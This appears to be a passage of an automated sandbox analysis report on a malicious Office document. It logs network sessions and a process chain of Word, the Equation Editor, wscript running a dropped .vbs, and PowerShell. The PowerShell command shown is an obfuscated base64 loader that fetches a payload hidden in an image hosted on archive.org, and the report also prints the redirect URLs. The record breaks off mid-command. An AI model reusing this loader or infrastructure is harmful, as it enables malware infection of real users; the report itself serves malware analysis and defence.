                                                      Content-Security-Policy: default-src 'none'
                                                      2024-08-31 13:51:12 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.2249168208.64.171.2304433692C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:51:12 UTC134OUTHEAD /udMVqm HTTP/1.1
                                                      User-Agent: Microsoft Office Existence Discovery
                                                      Host: crash.sh
                                                      Content-Length: 0
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:51:12 UTC575INHTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:12 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 200
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Location: http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc
                                                      Vary: Accept


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.2249171207.241.232.1544432892C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:51:19 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                      Host: ia803104.us.archive.org
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:51:19 UTC591INHTTP/1.1 200 OK
                                                      Server: nginx/1.24.0 (Ubuntu)
                                                      Date: Sat, 31 Aug 2024 13:51:19 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1931225
                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                      Connection: close
                                                      ETag: "66a41ab4-1d77d9"
                                                      Strict-Transport-Security: max-age=15724800
                                                      Expires: Sat, 31 Aug 2024 19:51:19 GMT
                                                      Cache-Control: max-age=21600
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                      Access-Control-Allow-Credentials: true
                                                      Accept-Ranges: bytes
                                                      2024-08-31 13:51:19 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                      2024-08-31 13:51:19 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                      Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                      2024-08-31 13:51:20 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                      Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                      2024-08-31 13:51:20 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                      Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                      2024-08-31 13:51:20 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                      Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                      2024-08-31 13:51:20 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                      Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                      2024-08-31 13:51:20 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                      Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                      2024-08-31 13:51:20 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                      Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                      2024-08-31 13:51:20 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                      Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                      2024-08-31 13:51:20 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                      Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:09:50:34
                                                      Start date:31/08/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13faa0000
                                                      File size:28'253'536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:09:50:57
                                                      Start date:31/08/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                      Imagebase:0x13f2c0000
                                                      File size:1'423'704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:09:51:12
                                                      Start date:31/08/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:09:51:13
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
                                                      Imagebase:0x5f0000
                                                      File size:141'824 bytes
                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:09:51:13
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? 